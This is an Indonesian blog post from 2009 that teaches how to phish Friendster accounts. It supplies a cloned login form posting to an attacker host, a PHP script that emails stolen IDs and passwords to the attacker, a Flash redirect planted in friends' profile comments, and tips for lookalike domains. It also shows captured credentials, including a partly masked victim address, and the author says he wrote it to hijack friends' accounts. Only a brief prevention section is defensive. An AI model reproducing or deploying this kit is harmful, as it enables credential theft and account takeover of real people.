jump to navigation

Cara Hack FS Juni 5, 2009

Posted by whiray in Tips.
trackback

D

Hasil capture FS orang lain hehehe FS siapa yah ? mohon maaf kalo yg punya lihat, tolong diganti passwordnya :)

Dalam komputer, istilah bahasa Inggris phishing adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi sensitif, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti e-mail atau pesan instan. Istilah ini muncul dari kata bahasa Inggris fishing (’memancing’),dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna. Oleh : http://id.wikipedia.org/wiki/Phishing.

Sedangkan menurut saya Phishing sendiri mempunya arti menyamarkan sesuatu yang asli dengan yang palsu, sehingga yang palsu benar-benar mirip dengan yang asli, dengan tujuan penipuan. Kasus Phishing pernah terjadi di Official Web site BCA Online, hingga sekarang yaitu FS.

Pembahasan ini sudah dijumpai dibanyak blog-blog namun pada umumnya hanya memberikan sedikit sekali gambaran bagaimana proses phishing itu terjadi, apabila tidak hati-hati maka account kita + passwordnya akan diketahui oleh orang lain.
Baiklah sekarang akan saya berikan gambaran mengenai Phishing di FS, dalam proses Phishing di FS ada beberapa hal yang harus diketahui(versi saya), yaitu :

1. Manajemen File URL.
2. Pemahaman Form HTML.
3. mail() command di PHP.
4. Pemahaman Redirection.
5. Kreatifitas difakename URL.

5 hal tersebut merupakan faktor wajib yang harus diketahui sebelum melakukan Phishing, mengapa karena 5 komponen dasar tersebut menentukan berhasil/tidaknya sebuah Phishing, saya jelaskan fungsional 5 komponen tersebut.

1.Manajemen File URL.

Pentingnya manajemen File Url adalah dimana proses pemalsuan sebuah form yang asli ke yg palsu/yg akan kita gunakan, haruslah benar” sama modelnya/bentuknya sehingga orang lain bila tidak sangat teliti akan terkecoh bahwa form yang ada dimonitornya adalah asli, bila menggunakan Mozilla Firefox anda bisa mencuri form Login FS dengan menggunakan perintah : File > Save Page As > Filename isi “index.htm” > dan Save as Type “Web page, complete”. Tujuan dari penyimpanan file login tersebut adalah untuk membuat Login FS vesi Fake-nya, setelah kita simpan, kemudian kita rubah form actionnya seperti penjelasan no 2. Kemudian semua file tadi kita Upload ke Free Hosting kesukaan kita, saya menggunakan http://www.ripway.com -> ( http://h1.ripway.com/friendsterid ). Alamat diatas modelnya sama persis dengan Form login FS sehingga jika kita tidak teliti sangat berbahaya, yang membedakan adalah slide foto tidak berubah jika di refresh, dan juga tanggalnya, dan perhatikan source htmlnya khususnya dibagian <form>.

2. Pemahaman Form HTML.

Form HTML merupakan komponen dasar untuk mengirim informasi calon korban yang perlu dipamahami adalah komponen <form>,<input> komponen <form> mempunyai sub komponen yaitu “method” dan “action”, dimana action sangat menentukan proses Phishing yang akan kita lakukan, dan untuk <input> penting pada komponen “name” di FS input ada 2 sub komponen penting pembawa bencana🙂, yaitu “email” dan “password” dimana “email” adalah id login si calon korban, script dibawah ini adalah contoh kutipan form yang saya gunakan untuk Phishing di FS.

index.htm, form yang di edit untuk phishing

<form name="login_form" method="post" action="http://fakename.com/login.php">
Email: <input name="email" maxlength="100" size="22" alt="Email Address"
tabindex="1" style="width: 200px ! important;" value="" type="text">
Password: <input name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px ! important;" type="password">
<td><div><input value="Log In" tabindex="3" type="submit">
</form>

Yang saya rubah pada bagian “action” saja, diarahkan ke file penyetor password (login.php versi kita)yang nantinya dikirim ke e-mail kita menggunakan aplikasi PHP.

3. Function mail() di PHP.

Saya pilih opsi ini karena mudah menggunakannya, ada opsi lain misal store database, namun tambah ribed nantinya anda harus membuat database untuk memasuk kan email dan password korban, dan jika mencari free hostingan php yang support ke database agak sulit🙂, lebih baik lagi jika anda mempunyai hostingan yang bayar dan support ke database plus function mail(), langsung saja, kita harus me ngetahui fungsi ini karena pada saat si target login di fake FS kita, maka disinilah password dan user name di setor ke kita, dengan menngunakan fungsi mail() di php password dan user di setor ke alamat e-mail kita, disini nama file yang digunakan adalah “login.php” file tersebut kita tempatkan di hostingan milik kita(baik yg free / bayar, pastinya harus support mail(), silahkan anda coba” terlebih dahulu, atau baca howto mail() function di php manual), script dibawah ini yang saya gunakan untuk mengirim user dan password sitarget ke e-mail saya:

login.php, store user + password ke e-mail
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :)’;
$message = $isi;
$headers = ‘Rejeki FS :)’;
mail($to, $subject, $message, $headers);
?>

Sangat sederhana :) namun mematikan, jika ada yang login di fake FS kita maka user dan password akan dikirim ke “emailkita@fakename.com” dan kemudian halaman ini akan di redirect ke http://www.friendster.com”, akan kita bahas nanti mengenai redirect.

4. Pemahaman Redirection.

Redirection merupakan proses pemindahan halaman web secara otomatis/manual menggunakan script, script pertama redirection yang harus anda tahu adalah Redirection dari FS ke Fakefs kita, jadi option ini bisa menggunakan opsi manual dan otomatis, opsi manual bisa menggunakan gambar yang menarik sehingga jika kita klik gambar tersebut akan mengarah ke Fakefs kita, dan jika sudah ter klik dan target mengisikan login dan passwordnya di Fakefs kita, berhasil sudah cara ini, jika menggunakan opsi otomatis, yang saya gunakan adalah script di Flash berupa action script GetURL(”url”,”type”,”method”);, pada aplikasi flash jika kita menggunakan GetURL maka otomatis pada saat load animasi kita yang di dalamnya sudah disusupi GetURL maka halaman FS akan di redirect ke Fakefs kita (contoh : http://www.friendster.com/kuyamudik ). Jika halaman FS disamping kita buka menggunakan IE maka otomatis akan di redirect ke halaman Fakefs, karena di ditesti FS tersebut sudah ada file flash yang meredirect dari FS ke Fakefs, perhatikan address barnya, dan opsi ini berlaku jika menggunakan IE, jika pada Mozilla Firefox tidak berlaku, kecuali menggunakan type _blank.

Action Script yang saya gunakan di Flash:
press-fs.swf, file animasi disusupi action script redirection

getURL("http://friendster-id.cjb.net","_self","get");

Redirection ke 2 berada di file login.php dimana Email login dan password di kirim ke e-mail saya, karena menggunakan koneksi IIX, redirection ini tidak akan terasa, tau-tau anda sudah ada di halaman FS anda sendiri, padahal setelah anda login untuk ke 2 kalinya anda sudah terjebak, berikut script redirection ke 2 yang saya gunakan:

login.php, file pengirim Email login FS + password ke email saya

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.friendster.com">
<?
$id=$HTTP_POST_VARS['email'];
$pass=$HTTP_POST_VARS['password'];
$isi=”id: $id | password: $pass”;
$to = ‘emailkita@fakename.com’;
$subject = ‘Friendster Trap :)’;
$message = $isi;
$headers = ‘Rejeki FS :)’;
mail($to, $subject, $message, $headers);
?>

5. Kreatifitas Fakename URL.

Bagian ini juga sangat mendukung suksesnya Phishing di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fakefs kita, saya sendiri menggunakan Fakefs domain http://www.friendster-id.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja🙂.

Rule Phishing FS, menurut gaya saya🙂.

[Target]->[Buka dan Login FS]->[Lihat testi teman yang terinfeksi Redirection]
|– [Jika menggunakan Mozilla Firefox, halaman gagal di redirect]->[Gagal]->[X]
|– [jika menggunakan IE, halaman akan di redirect ke Fakefs]->[Login di Fakefs]
->[Email + Password di rekam & dikirim ke email saya]->[diredirect ke FS semula]
->[Phishing FS sukses].

Sederhana sekali bukan?🙂.

Komponen-komponen yang saya pakai:
1. Freehosting di : http://www.ripway.com

(http://h1.ripway.com/friendsterid) Sebagai tempat menyimpan file FS palsu/Fakefs yang sudah saya modif di bagian formnya.
2. Freedomain : http://www.cjb.net (http://www.friendster-id.cjb.net)

Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file yang ada di ripway.com
3. Hosting PHP :

Hostingan yang support dengan function mail() yang digunakan untuk eksekusi pengiriman email dan password si target, disini saya gunakan login.php, atau anda akan menggunakan aplikasi database, silahkan saja, atau write() terserah kreasi anda sekalian🙂.

4. File Redirect :

Saya menggunakan Flash, karena option otomatis redirectnya🙂, hanya kelemahannya di Firefox tidak mempan🙂, file ini nantinya akan disertakan di testi target.

5. Email :

Alamat email untuk store email dan password target.

Contoh FS di comment/testinya sudah terkena Phishing :
http://www.friendster.com/kuyamudik

Contoh hasil target yang sukses terkirim di email saya:
± From Date Subject
============================================
± Nobody 10:16 am Friendster Trap :)
± Nobody 7:37 am Friendster Trap :)
± Nobody Mon, 10:37 pm Friendster Trap :)
± Nobody Mon, 10:25 pm Friendster Trap :)

Jika dibuka isinya:
=================================================
Rejeki FS :)

id: sapoedjagad@hotmail.com | password: s******t

PENCEGAHAN

Ada beberapa Opsi yang harus kita perhatikan untuk FS ini, diantaranya:

  1. Biasakan membuka FS menggunakan Mozilla Firefox🙂.
  2. Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing🙂. Option -> Approve comments automatically: Pilih “Never”.
  3. Teliti jika ingin login lihat URL nya, jika bukan dari http://friendster.com maka jangan berani-berani login, close saja, dan buka http://friendster.com.

Hanya opsi tersebut yang dapat saya sampaikan, sering-sering cek menggunakan 2 Browser lebih bagus.

Artikel ini saya tulis karena iseng saja, ingin ngebajak FS temen hehe :D dan gunakan sebagai informasi yang positif, jika ada yg menyalahgunakan isi diartikel ini penulis tidak bertanggung jawab.

Komentar»

1. wahyu am - Juni 8, 2009

wush, nice info juragan.
harus lebih hati2 nih.
kalo facebook sama ya prosesnya?

2. KRozz3R - Juli 14, 2009

. masih gak ngerti sayah GAN
.maklom newBIE heheheh
. kirimin aja deh yg sesimpel” nya buat ngehack fs
. klo dbisa seh sama bwt ngehack fb
. kirimin aja gan ke eMail sayah
onadhacker@yahoo.co.id
. thnk’s sembelumnya GAN
. di tunggu SESIMPEL” nya yah


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: